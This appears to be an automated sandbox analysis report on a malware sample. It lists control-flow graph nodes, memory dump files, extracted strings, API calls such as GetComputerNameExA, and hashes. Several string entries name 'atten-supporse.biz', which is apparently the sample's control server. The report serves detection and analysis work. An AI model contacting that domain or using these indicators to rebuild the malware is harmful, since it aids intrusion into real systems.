253->254 255 c5e77b-c5e783 253->255 256 c5e770-c5e779 254->256 257 c5e785-c5e786 255->257 258 c5e79b-c5e7a5 255->258 256->255 256->256 259 c5e790-c5e799 257->259 260 c5e7a7-c5e7ab 258->260 261 c5e7bb-c5e7c3 258->261 259->258 259->259 262 c5e7b0-c5e7b9 260->262 263 c5e7c5-c5e7c6 261->263 264 c5e7db-c5e7e5 261->264 262->261 262->262 265 c5e7d0-c5e7d9 263->265 266 c5e7e7-c5e7eb 264->266 267 c5e7fb-c5e807 264->267 265->264 265->265 268 c5e7f0-c5e7f9 266->268 269 c5e821-c5e948 267->269 270 c5e809-c5e80b 267->270 268->267 268->268 272 c5e950-c5e96a 269->272 271 c5e810-c5e81d 270->271 271->271 274 c5e81f 271->274 272->272 273 c5e96c-c5e98f 272->273 275 c5e990-c5e9b9 273->275 274->269 275->275 276 c5e9bb-c5e9e2 call c5b6a0 275->276 278 c5e9e7-c5e9fd 276->278
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Uninitialize
                                                                                    • String ID: "# `$,$I~$`~$atten-supporse.biz$qx$s
                                                                                    • API String ID: 3861434553-3378010734
                                                                                    • Opcode ID: 280a2c99af7877ae01ab1079b9b3f7fb2261c9c690eb88c7562d9a3223ba4654
                                                                                    • Instruction ID: 85ea52d605edae5f4e0f9cc3fbd822557b0d03ad674fef42e575eb6e2b9591ee
                                                                                    • Opcode Fuzzy Hash: 280a2c99af7877ae01ab1079b9b3f7fb2261c9c690eb88c7562d9a3223ba4654
                                                                                    • Instruction Fuzzy Hash: 4002DDB410C3D18BD335CF2584A07EBBFE1AF92305F1899ACD8DA5B252D635064A8B67

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 279 c5a960-c5a989 280 c5a990-c5a9e5 279->280 280->280 281 c5a9e7-c5aadf 280->281 282 c5aae0-c5ab1b 281->282 282->282 283 c5ab1d-c5ab39 282->283 284 c5ab40-c5ab69 283->284 284->284 285 c5ab6b-c5ab7a call c5b6a0 284->285 287 c5ab7f-c5ab86 285->287 288 c5ab8c-c5ab98 287->288 289 c5ae29-c5ae32 287->289 290 c5aba0-c5abb2 288->290 290->290 291 c5abb4-c5abb9 290->291 292 c5abc0-c5abcc 291->292 293 c5abd3-c5abe4 292->293 294 c5abce-c5abd1 292->294 295 c5ae20-c5ae26 call c89b60 293->295 296 c5abea-c5abff 293->296 294->292 294->293 295->289 297 c5ac00-c5ac41 296->297 297->297 299 c5ac43-c5ac50 297->299 301 c5ac84-c5ac88 299->301 302 c5ac52-c5ac58 299->302 303 c5ae1e 301->303 304 c5ac8e-c5acb6 301->304 305 c5ac67-c5ac6b 302->305 303->295 306 c5acc0-c5acf4 304->306 305->303 307 c5ac71-c5ac78 305->307 306->306 308 c5acf6-c5acff 306->308 309 c5ac7e 307->309 310 c5ac7a-c5ac7c 307->310 311 c5ad34-c5ad36 308->311 312 c5ad01-c5ad0b 308->312 313 c5ac60-c5ac65 309->313 314 c5ac80-c5ac82 309->314 310->309 311->303 316 c5ad3c-c5ad52 311->316 315 c5ad17-c5ad1b 312->315 313->301 313->305 314->313 315->303 317 c5ad21-c5ad28 315->317 318 c5ad60-c5adb2 316->318 319 c5ad2e 317->319 320 c5ad2a-c5ad2c 317->320 318->318 321 c5adb4-c5adbe 318->321 322 c5ad10-c5ad15 319->322 323 c5ad30-c5ad32 319->323 320->319 324 c5adf4-c5adf8 321->324 325 c5adc0-c5adc8 321->325 322->311 322->315 323->322 326 c5adfe-c5ae1c call c5a6d0 324->326 327 c5add7-c5addb 325->327 326->295 327->303 328 c5addd-c5ade4 327->328 330 c5ade6-c5ade8 328->330 331 c5adea-c5adec 328->331 330->331 333 c5add0-c5add5 331->333 334 c5adee-c5adf2 331->334 333->327 335 c5adfa-c5adfc 333->335 334->333 335->303 335->326
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
                                                                                    • API String ID: 0-490458541
                                                                                    • Opcode ID: 6466994ce0b87e90d17754a2f3ae6fc80c434e76164fa8b0298d3f64a03c1352
                                                                                    • Instruction ID: f8ca170a4c2ac0b07b98e5a383ff8a5b8764629d030e897af213db04ca03910f
                                                                                    • Opcode Fuzzy Hash: 6466994ce0b87e90d17754a2f3ae6fc80c434e76164fa8b0298d3f64a03c1352
                                                                                    • Instruction Fuzzy Hash: 3EC1467660C3504BC724CF2588905AFBBE3ABC1305F1E8A2CE9D54B342C676994EC78B

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 336 c5ce55-c5ce62 337 c5ce70-c5ce9b 336->337 337->337 338 c5ce9d-c5ced5 call c58720 call c86f90 337->338 343 c5cee0-c5cf06 338->343 343->343 344 c5cf08-c5cf6b 343->344 345 c5cf70-c5cfa7 344->345 345->345 346 c5cfa9-c5cfba 345->346 347 c5cfc0-c5cfcb 346->347 348 c5d03d 346->348 349 c5cfd0-c5cfd9 347->349 350 c5d041-c5d049 348->350 349->349 351 c5cfdb 349->351 352 c5d05b-c5d068 350->352 353 c5d04b-c5d04f 350->353 351->350 355 c5d08b-c5d093 352->355 356 c5d06a-c5d071 352->356 354 c5d050-c5d059 353->354 354->352 354->354 357 c5d095-c5d096 355->357 358 c5d0ab-c5d1c6 355->358 359 c5d080-c5d089 356->359 360 c5d0a0-c5d0a9 357->360 361 c5d1d0-c5d215 358->361 359->355 359->359 360->358 360->360 361->361 362 c5d217-c5d239 361->362 363 c5d240-c5d250 362->363 363->363 364 c5d252-c5d27f call c5b6a0 363->364 366 c5d284-c5d29e 364->366
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EA66A9D61CD77F8D23D904AF30EFEBBC$F^$I@$N~ :$VgfW$atten-supporse.biz$z@(
                                                                                    • API String ID: 0-1503950166
                                                                                    • Opcode ID: 87ec4c127d4676faff93d52205a1af541001efd818a73159b32442f5482c751d
                                                                                    • Instruction ID: e4b0544f57ab8e09373c889cb3105c8ffe834cc6094de20e498d22cd408cac0d
                                                                                    • Opcode Fuzzy Hash: 87ec4c127d4676faff93d52205a1af541001efd818a73159b32442f5482c751d
                                                                                    • Instruction Fuzzy Hash: DA91E1B41493C18BD335CF25D490BEBBBE0AB96314F148D6CD8EA4B242D738454ACB56

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 367 c733a0-c733ef 368 c733f0-c73402 367->368 368->368 369 c73404-c73445 368->369 371 c73450-c7347c 369->371 371->371 372 c7347e-c73488 371->372 373 c734d7-c734e3 372->373 374 c734c6 372->374 375 c737d5-c7387f 372->375 376 c734e4-c734f5 372->376 377 c73610-c7361d 372->377 378 c73600-c73607 372->378 379 c7348f-c73495 372->379 380 c734ce-c734d4 call c58000 372->380 381 c737ba 372->381 382 c737a8-c737b2 372->382 374->380 390 c73880-c7389c 375->390 383 c734f7-c734fc 376->383 384 c734fe 376->384 385 c73626 377->385 386 c7361f-c73624 377->386 378->377 387 c73497-c7349c 379->387 388 c7349e 379->388 380->373 382->381 391 c73500-c73537 call c57ff0 383->391 384->391 392 c7362d-c736d9 call c57ff0 385->392 386->392 393 c734a1-c734bf call c57ff0 387->393 388->393 390->390 395 c7389e-c738ae call c715f0 390->395 404 c73540-c73585 391->404 405 c736e0-c73724 392->405 393->373 393->374 393->375 393->376 393->377 393->378 393->380 393->381 393->382 400 c738b3-c738b6 395->400 406 c738be-c738db 400->406 404->404 407 c73587-c7358f 404->407 405->405 408 c73726-c7372e 405->408 410 c738e0-c73904 406->410 411 c735b1-c735bd 407->411 412 c73591-c73596 407->412 413 c73751-c73761 408->413 414 c73730-c73737 408->414 410->410 415 c73906-c73989 410->415 417 c735e1-c735ec call c8d6c0 411->417 418 c735bf-c735c3 411->418 416 c735a0-c735af 412->416 420 c73763-c73767 413->420 421 c73781-c737a1 call c8d6c0 413->421 419 c73740-c7374f 414->419 422 c73990-c739be 415->422 416->411 416->416 428 c735f1-c735f9 417->428 423 c735d0-c735df 418->423 419->413 419->419 425 c73770-c7377f 420->425 421->373 421->380 421->381 421->382 421->406 429 c737c0-c737c6 call c58000 421->429 435 c739f1-c739f7 call c58000 421->435 436 c737cf 421->436 437 c739eb 421->437 422->422 427 c739c0-c739e3 call c71270 422->427 423->417 423->423 425->421 425->425 427->437 428->375 428->377 428->378 428->381 428->382 428->406 428->429 429->436 436->375 437->435
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #R,T$$^<P$VW$]~"p$ij$KM
                                                                                    • API String ID: 0-788320361
                                                                                    • Opcode ID: ff79a4db020f8fb4b071c11987ea501251f1fa89dd3ecda16067fd59a114c193
                                                                                    • Instruction ID: 0d1c1a03ecf5fdb743ad00bb960a1aa036b2fe970309f593b06f8f435a0a6123
                                                                                    • Opcode Fuzzy Hash: ff79a4db020f8fb4b071c11987ea501251f1fa89dd3ecda16067fd59a114c193
                                                                                    • Instruction Fuzzy Hash: 66F1DAB16083408FD314DF65D88162FBBE1EF95304F44892DF5AA8B291E778DA4ACB53

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 441 c7bfda-c7c03f call c8ce00 445 c7c040-c7c06c 441->445 445->445 446 c7c06e-c7c078 445->446 447 c7c09d 446->447 448 c7c07a-c7c083 446->448 450 c7c09f-c7c0ac 447->450 449 c7c090-c7c099 448->449 449->449 451 c7c09b 449->451 452 c7c0ae-c7c0b5 450->452 453 c7c0cb-c7c13a FreeLibrary call c8ce00 GetComputerNameExA 450->453 451->450 454 c7c0c0-c7c0c9 452->454 458 c7c140-c7c167 453->458 454->453 454->454 458->458 459 c7c169-c7c173 458->459 460 c7c175-c7c17f 459->460 461 c7c18d 459->461 463 c7c180-c7c189 460->463 462 c7c18f-c7c19c 461->462 465 c7c19e-c7c1a5 462->465 466 c7c1bb-c7c20f GetComputerNameExA 462->466 463->463 464 c7c18b 463->464 464->462 467 c7c1b0-c7c1b9 465->467 468 c7c210-c7c252 466->468 467->466 467->467 468->468 469 c7c254-c7c25e 468->469 470 c7c260-c7c267 469->470 471 c7c27b-c7c288 469->471 472 c7c270-c7c279 470->472 473 c7c2ab-c7c2ff 471->473 474 c7c28a-c7c291 471->474 472->471 472->472 477 c7c300-c7c324 473->477 475 c7c2a0-c7c2a9 474->475 475->473 475->475 477->477 478 c7c326-c7c330 477->478 479 c7c332-c7c339 478->479 480 c7c34b-c7c358 478->480 481 c7c340-c7c349 479->481 482 c7c37b-c7c3d6 call c8ce00 480->482 483 c7c35a-c7c361 480->483 481->480 481->481 488 c7c3e0-c7c3fa 482->488 484 c7c370-c7c379 483->484 484->482 484->484 488->488 489 c7c3fc-c7c406 488->489 490 c7c41b-c7c42f 489->490 491 c7c408-c7c40f 489->491 492 c7c435-c7c43c 490->492 493 c7c572-c7c5b1 490->493 494 c7c410-c7c419 491->494 495 c7c440-c7c44a 492->495 496 c7c5c0-c7c5e7 493->496 494->490 494->494 497 c7c460-c7c466 495->497 498 c7c44c-c7c451 495->498 496->496 499 c7c5e9-c7c5fb 496->499 501 c7c490-c7c49e 497->501 502 c7c468-c7c46b 497->502 500 c7c510-c7c516 498->500 503 c7c5fd-c7c604 499->503 504 c7c61b-c7c61e call c80520 499->504 510 c7c518-c7c51e 500->510 507 c7c4a4-c7c4a7 501->507 508 c7c52a-c7c533 501->508 502->501 505 c7c46d-c7c483 502->505 506 c7c610-c7c619 503->506 512 c7c623-c7c643 504->512 505->500 506->504 506->506 507->508 511 c7c4ad-c7c50e 507->511 514 c7c535-c7c537 508->514 515 c7c539-c7c53c 508->515 510->493 513 c7c520-c7c522 510->513 511->500 513->495 518 c7c528 513->518 514->510 516 c7c56e-c7c570 515->516 517 c7c53e-c7c56c 515->517 516->500 517->500 518->493
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?), ref: 00C7C0D7
                                                                                    • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00C7C113
                                                                                    • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00C7C1D8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ComputerName$FreeLibrary
                                                                                    • String ID: x
                                                                                    • API String ID: 2243422189-2363233923
                                                                                    • Opcode ID: 13c6f83e0e476c57b48817d96f4d74f474014ee52ba85bd984abaf33479c0196
                                                                                    • Instruction ID: bace56f95d7228d12e2e1f503f06331642cacb619d5e304052604e4ae661d666
                                                                                    • Opcode Fuzzy Hash: 13c6f83e0e476c57b48817d96f4d74f474014ee52ba85bd984abaf33479c0196
                                                                                    • Instruction Fuzzy Hash: D4D1B36060C7D18ED7358B3984903BBBBD1AFE7344F5889ADD0D99B282D7398509CB53

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 519 c86c40-c86c74 call c64a30 522 c86c76-c86c79 519->522 523 c86c7b-c86cd3 522->523 524 c86cd5-c86cf0 522->524 523->522 525 c86cf2-c86cf5 524->525 526 c86d21-c86d24 525->526 527 c86cf7-c86d1f 525->527 528 c86d26-c86d31 526->528 527->525 529 c86d33 528->529 530 c86d35-c86d4a 528->530 531 c86da2-c86da5 529->531 532 c86d4c 530->532 533 c86d4e-c86d59 530->533 534 c86da9-c86db3 531->534 535 c86da7 531->535 536 c86d96-c86d99 532->536 533->536 537 c86d5b-c86d91 call c8b480 533->537 540 c86dba-c86dd8 534->540 541 c86db5 534->541 535->534 538 c86d9b 536->538 539 c86d9d-c86da0 536->539 537->536 538->531 539->528 544 c86dda-c86ddd 540->544 543 c86f75-c86f82 541->543 546 c86e09-c86e0c 544->546 547 c86ddf-c86e07 544->547 548 c86e0e-c86e19 546->548 547->544 549 c86e1b 548->549 550 c86e20-c86e38 548->550 551 c86ea2-c86ea5 549->551 552 c86e3a 550->552 553 c86e3c-c86e47 550->553 554 c86ea9-c86eae 551->554 555 c86ea7 551->555 556 c86e92-c86e96 552->556 553->556 557 c86e49-c86e85 call c8b480 553->557 561 c86ebe-c86edc 554->561 562 c86eb0-c86ebc 554->562 555->554 559 c86e98 556->559 560 c86e9a-c86e9d 556->560 563 c86e8a-c86e8d 557->563 559->551 560->548 564 c86ede-c86ee1 561->564 562->561 563->556 565 c86f0d-c86f10 564->565 566 c86ee3-c86f0b 564->566 567 c86f12-c86f18 565->567 566->564 568 c86f1a 567->568 569 c86f1c-c86f2e 567->569 572 c86f73 568->572 570 c86f30 569->570 571 c86f32-c86f38 569->571 573 c86f67-c86f6a 570->573 571->573 574 c86f3a-c86f64 call c8b480 571->574 572->543 576 c86f6c-c86f6f 573->576 577 c86f71 573->577 574->573 576->567 577->572
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `$a$b$c$cba`cba`
                                                                                    • API String ID: 0-3925122358
                                                                                    • Opcode ID: 81a9a1b95515452819c8c6c9cd5bb85d39162a4f17e092e4a78224dddb4a0021
                                                                                    • Instruction ID: 1ca8ffcd3922bfe1eaf72250dd43f45b7407153cf9f3f5771cd90e87d10e923c
                                                                                    • Opcode Fuzzy Hash: 81a9a1b95515452819c8c6c9cd5bb85d39162a4f17e092e4a78224dddb4a0021
                                                                                    • Instruction Fuzzy Hash: 3BA15871E08354CFDB04DBADD4553AEBFF2AB95308F18806ED486A7392C679C900CB96

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 579 c5c36e-c5c559 580 c5c560-c5c58e 579->580 580->580 581 c5c590-c5c7ab 580->581 583 c5c7b0-c5c7de 581->583 583->583 584 c5c7e0-c5c7e8 583->584 585 c5c7ec-c5c7ff 584->585
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ){+}$4cde$CJ$F'k)$GS
                                                                                    • API String ID: 0-4192230409
                                                                                    • Opcode ID: 6c24714162b113239f7aa2bcd5a21c64ff2fac9590910f322828e433d867bcb8
                                                                                    • Instruction ID: bd02f52609f96bc38af50f8626dfab8e1902e38a0ca509bf3d0f9e7f54b91466
                                                                                    • Opcode Fuzzy Hash: 6c24714162b113239f7aa2bcd5a21c64ff2fac9590910f322828e433d867bcb8
                                                                                    • Instruction Fuzzy Hash: A0B12BB84053058FE354DF628588FAA7BB0FB25310F1A82E9E0992F772D7748409CF96

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
